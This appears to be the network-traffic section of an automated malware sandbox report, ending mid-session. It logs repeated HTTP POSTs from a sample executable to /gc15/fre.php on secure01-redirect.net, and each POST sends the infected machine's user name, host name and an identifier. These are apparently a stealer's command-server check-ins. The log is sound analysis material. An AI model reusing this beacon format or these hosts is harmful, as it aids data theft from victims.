                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:44.854403019 CET1397OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:46.235904932 CET1468INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:26 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                13192.168.2.649793185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:51.111628056 CET1514OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:51.168366909 CET1514OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:52.495630026 CET1514INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:32 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                14192.168.2.649795185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:55.089534044 CET1516OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:55.158164978 CET1520OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:56.498845100 CET1537INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:36 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.649797185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:59.460407019 CET1545OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:59.528026104 CET1545OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:00.863837957 CET1545INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:41 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.649802185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:02.169111967 CET3128OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:02.235896111 CET4307OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:03.551551104 CET10282INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:44 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                17192.168.2.649818185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:06.424436092 CET10554OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:06.481630087 CET10561OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:07.849755049 CET10771INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:48 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                18192.168.2.649830185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:10.077239037 CET10784OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:10.133827925 CET10786OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:11.381908894 CET12486INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:51 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                19192.168.2.649840185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:12.712441921 CET12493OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:12.782733917 CET12493OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:14.111047983 CET12494INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:54 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.649771185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:14.709347010 CET1243OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:14.779185057 CET1244OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:16.117796898 CET1343INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:56 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                20192.168.2.649841185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:17.281043053 CET12494OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:17.348575115 CET12495OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:18.654022932 CET12495INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:39:59 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                21192.168.2.649842185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:20.171529055 CET12496OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:20.238980055 CET12496OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:21.628648043 CET12496INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:02 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                22192.168.2.649845185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:23.240806103 CET12504OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:23.307615995 CET12504OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:24.676434040 CET12504INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:05 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                23192.168.2.649850185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:27.482882977 CET12520OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:27.550404072 CET12520OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:28.925374031 CET12521INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:09 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                24192.168.2.649851185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:31.054519892 CET12521OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:31.112103939 CET12522OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:32.352724075 CET12522INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:12 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                25192.168.2.649852185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:33.510654926 CET12523OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:33.577954054 CET12523OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:35.007775068 CET12524INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:15 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                26192.168.2.649854185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:37.134931087 CET12525OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:37.202991009 CET12530OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:38.454946995 CET12534INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:19 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                27192.168.2.649855185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:40.133790970 CET12535OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:40.201057911 CET12535OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:41.392921925 CET12542INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:21 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                28192.168.2.649862185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:42.445022106 CET12553OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:42.514592886 CET12555OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:43.841937065 CET12567INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:24 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                29192.168.2.649870185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:46.720808029 CET12578OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:38:46.777277946 CET12579OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:38:48.177226067 CET12591INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:40:28 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                3192.168.2.649773185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:37:17.458668947 CET1344OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
                Jan 28, 2022 23:37:17.514823914 CET1344OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 32 00 35 00 38 00 35 00 35 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                Data Ascii: (ckav.ruengineer258555DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                Jan 28, 2022 23:37:18.890583992 CET1344INHTTP/1.0 404 Not Found
                Date: Fri, 28 Jan 2022 22:38:59 GMT
                Server: Apache/2.4.6 (CentOS) PHP/5.4.16
                X-Powered-By: PHP/5.4.16
                Status: 404 Not Found
                Content-Length: 23
                Content-Type: text/html; charset=UTF-8
                Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                Data Ascii: File not found.


                Session IDSource IPSource PortDestination IPDestination PortProcess
                30192.168.2.649881185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
                TimestampkBytes transferredDirectionData
                Jan 28, 2022 23:38:49.452650070 CET12601OUTPOST /gc15/fre.php HTTP/1.0
                User-Agent: Mozilla/4.08 (Charon; Inferno)
                Host: secure01-redirect.net
                Accept: */*
                Content-Type: application/octet-stream
                Content-Encoding: binary
                Content-Key: 7A2E941E
                Content-Length: 169
                Connection: close
